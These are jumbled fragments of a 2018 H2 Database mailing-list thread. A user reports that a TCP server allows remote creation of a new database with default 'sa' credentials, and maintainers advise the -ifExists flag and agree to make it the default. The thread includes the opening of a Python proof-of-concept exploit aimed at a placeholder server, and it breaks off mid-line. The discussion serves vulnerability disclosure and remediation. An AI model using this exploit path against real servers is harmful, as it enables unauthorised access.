Agreed, it's best to have secure defaults. Thanks!
On Friday, November 2, 2018 at 2:06:55 AM UTC-4, Noel Grandin wrote:
>
> It's not unreasonable to make downstream users safer by making -ifExists
> the default for the TCP server mode.
>
--
You received this message because you are subscribed t
Thanks Evgenij, these config settings should take care of the problem for me
On Thursday, November 1, 2018 at 11:35:41 PM UTC-4, Evgenij Ryazanov wrote:
>
> Hello.
>
> Add -ifExists flag to your TCP server.
> http://www.h2database.com/html/advanced.html#remote_access
> You should not run TCP / Web
If I understand correctly, you don't need to know that - since I'm
referencing a database that does not yet exist ("C:\\Windows\\Temp\\exploit")
I can get away with specifying default credentials - "sa" with no password.
And that is what actually caused my original question - how can we secure
Here's a small Python POC:
- Windows-based (feel free to tweak for *nix)
- Requires jaydebeapi (run "pip install jaydebeapi")
- Assumes javac is in the system path (so does the original POC)
import jaydebeapi
SERVER = "SERVER_TO_EXPLOIT"
conn = jaydebeapi.connect("org.h2.Driver",
"jdbc:h2:tcp://%
Unfortunately, no - I rewrote it to go though JDBC and it still works...
On Thursday, November 1, 2018 at 12:35:20 PM UTC-4, Noel Grandin wrote:
>
>
> That exploit is about the web console. Do not enable the console outside
> of a testing environment and you will be fine.
>
>
>
--
You received
recommended remediation for this? Is there a code fix planned?
If it can be prevented through configuration changes can the appropriate
configuration setting be made the default?
Thanks!
0xd13a
--
You received this message because you are subscribed to the Google Groups "H2
Database"